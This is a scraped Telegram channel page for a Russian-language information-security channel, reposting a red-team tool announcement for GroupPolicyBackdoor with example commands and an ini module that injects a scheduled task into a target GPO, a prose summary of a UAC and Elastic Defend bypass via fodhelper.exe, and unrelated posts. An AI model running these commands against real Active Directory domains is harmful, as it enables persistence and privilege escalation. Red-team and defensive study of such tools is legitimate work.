fa
Feedback
Fsecurity | HH

Fsecurity | HH

رفتن به کانال در Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

نمایش بیشتر
2 018
مشترکین
-224 ساعت
+17 روز
-1430 روز
آرشیو پست ها
Repost from Whitehat Lab
💻 GroupPolicyBackdoor Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на 😰 Python Впервые представлена на DEFCON 33 Примеры:
#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'

#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
Пример ini:
[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]
GPO creation, deletion, backup and injections Various injectable configurations, with, for each, customizable options (see list in the wiki) Possibility to remove injected configurations from the target GPO Possibility to revert the actions performed on client devices GPO links manipulation GPO enumeration / user privileges enumeration on GPOs
💻 Repo 📔 Docs #gpo #redteam #windows ✈️ Whitehat Lab 💬Chat

Repost from Whitehat Lab
💻 Elastic Defend Bypass: UAC Bypass Chain Leading To Silent Elevation A chained technique has been identified that allows a
💻 Elastic Defend Bypass: UAC Bypass Chain Leading To Silent Elevation
A chained technique has been identified that allows a local, unprivileged attacker to achieve silent privilege escalation to administrator by bypassing protections enforced by Elastic Defend v9.0.4. The method leverages a trusted auto-elevated Windows binary (fodhelper.exe) in conjunction with a registry hijack and COM object execution, resulting in arbitrary code execution at elevated privileges - without triggering a UAC prompt or EDR detection
🔗 UAC Bypass 💻 Presentation #uac #bypass #windows #lpe ✈️ Whitehat Lab 💬Chat

sticker.webp0.28 KB

Repost from N/a
Скоро обещанный мой трек для Хаскаря будет)))
Скоро обещанный мой трек для Хаскаря будет)))

Repost from Whitehat Lab
💻 explainshell Интерактивная памятка по 🐧Linux утилитам 🔗 Web 💻 Repo #linux #shell ✈️ Whitehat Lab 💬Chat
💻 explainshell Интерактивная памятка по 🐧Linux утилитам 🔗 Web 💻 Repo #linux #shell ✈️ Whitehat Lab 💬Chat

Repost from 8ug8ear
GitLab_+_DefectDojo_+_AI_как_я_автоматизировала_поиск_багов_в_bug.pdf4.79 MB